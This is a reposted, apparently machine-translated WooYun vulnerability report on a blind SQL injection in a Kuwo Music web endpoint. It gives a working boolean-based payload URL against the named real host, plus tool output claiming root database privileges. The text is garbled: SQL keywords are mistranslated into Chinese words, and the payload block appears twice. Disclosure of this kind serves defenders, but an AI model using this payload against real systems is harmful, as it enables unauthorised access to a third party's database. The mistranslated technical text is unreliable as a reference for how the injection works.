酷我音乐APP某处ROOT权限注入2
漏洞标题 酷我音乐APP某处ROOT权限注入2 相关厂商 酷我音乐 漏洞作者 路人甲 提交时间 2016-04-25 16:59 公开时间 2016-06-10 11:00 漏洞类型 SQL注射漏洞 …
漏洞标题
酷我的音乐应用程序某处ROOT权限注入2
相关制造商
kuwo音乐
漏洞作者
过路人
提交时间
2016-04-25 16: 59
公共时间
2016-06-10 11: 00
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
15
漏洞状态
制造商已确认
标签标签
注入,Mysql
漏洞详细信息
有一个注入的URL
*****%E7%82%B9&安培;时间=1460765040&安培;页=*****
注射点:指数
手动注射实验
注射型,类型
基于布尔的盲人
参数:索引(GET)
输入:基于布尔值的盲
标题:和基于布尔的盲 - WHERE,H * ING,ORDER BY或GROUP BY子句
有效载荷:http://rewu.kuwo.cn/album/message/commmessage?topcolumn=%E8%A7%82%E7%82%B9&time=1460765040&page=1&index=101913和3478=3478& randnum=0.1987865
后端DBMS: MySQL 5.0.12
---
ROOT权限注入,当前用户
[电子邮件 保护]/*%
目前-DB
编辑
漏洞证明:
修理计划:
参数过滤
版权声明:请注明出处。居民A @乌云
注射型,类型
基于布尔的盲人
参数:索引(GET)
输入:基于布尔值的盲
标题:和基于布尔的盲 - WHERE,H * ING,ORDER BY或GROUP BY子句
有效载荷:http://rewu.kuwo.cn/album/message/commmessage?topcolumn=%E8%A7%82%E7%82%B9&time=1460765040&page=1&index=101913和3478=3478& randnum=0.1987865
后端DBMS: MySQL 5.0.12
---
ROOT权限注入,当前用户
[电子邮件 保护]/*%
目前-DB
编辑
漏洞证明:
修理计划:
参数过滤
版权声明:请注明出处。居民A @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 535 )
- 分类:黑客技术
